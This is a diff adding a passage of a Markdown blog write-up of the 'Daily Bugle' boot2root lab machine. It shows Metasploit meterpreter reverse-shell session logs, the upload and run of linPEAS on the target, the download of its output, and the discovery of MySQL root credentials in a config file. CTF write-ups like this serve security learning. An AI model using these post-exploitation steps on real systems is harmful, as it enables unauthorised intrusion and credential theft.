content/post/daily-bugle-boot2-root-writeup copy.md

```diff
@@ -0,0 +1,736 @@
+  2         meterpreter x86/linux  no-user @ dailybugle (uid=48, gid=48, euid=48, egid=48) @ 10.10.162.223  10.10.182.144:4433 -> 10.10.162.223:55960 (10.10.162.223)
+
+msf5 post(multi/manage/shell_to_meterpreter) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                                              Connection
+  --  ----  ----                   -----------                                                              ----------
+  1         meterpreter php/linux  apache (48) @ dailybugle                                                 10.10.182.144:4444 -> 10.10.162.223:36010 (10.10.162.223)
+  2         meterpreter x86/linux  no-user @ dailybugle (uid=48, gid=48, euid=48, egid=48) @ 10.10.162.223  10.10.182.144:4433 -> 10.10.162.223:55960 (10.10.162.223)
+
+msf5 post(multi/manage/shell_to_meterpreter) > sessions -k 1
+[*] Killing the following session(s): 1
+[*] Killing session 1
+[*] 10.10.162.223 - Meterpreter session 1 closed.
+```
+
+Once I had a stable shell established, I killed the original shell and quickly replaced the exploited template with it's original contents before verifying that I was now able to see the original, unmodified index page.
+
+![daily bugle restored index](/img/daily_bugle_http_replaced_landing_page.png)
+
+### Local enumeration
+With my new local shell, I reached for linPEAS to run a quick local enumeration of the host. 
+
+```
+msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
+[*] Starting interaction with 2...
+
+meterpreter > getpid 
+Current pid: 4344
+meterpreter > sysinfo 
+Computer     : 10.10.162.223
+OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.el7.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > cd /tmp
+meterpreter > upload /root/Desktop/PEASS/linPEAS/linpeas.sh
+[*] uploading  : /root/Desktop/PEASS/linPEAS/linpeas.sh -> linpeas.sh
+[*] Uploaded -1.00 B of 217.36 KiB (-0.0%): /root/Desktop/PEASS/linPEAS/linpeas.sh -> linpeas.sh
+[*] uploaded   : /root/Desktop/PEASS/linPEAS/linpeas.sh -> linpeas.sh
+meterpreter > shell
+Process 4353 created.
+Channel 2 created.
+./linpeas.sh > 10.10.162.223_enum.txt
+which: no fping in (/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin)
+
+meterpreter > download 10.10.162.223_enum.txt /root/ctf/
+[*] Downloading: 10.10.162.223_enum.txt -> /root/ctf//10.10.162.223_enum.txt
+[*] Downloaded 429.28 KiB of 429.28 KiB (100.0%): 10.10.162.223_enum.txt -> /root/ctf//10.10.162.223_enum.txt
+[*] download   : 10.10.162.223_enum.txt -> /root/ctf//10.10.162.223_enum.txt
+```
+
+The enumeration gave yielded a few pieces of information that seemed worthwhile, a username `jjameson` and a set of root credentials for mysql DB from the `/var/www/html/configuration.php` file. 
```

Comment:
The enumeration yielded a few pieces of information that seemed useful: a username...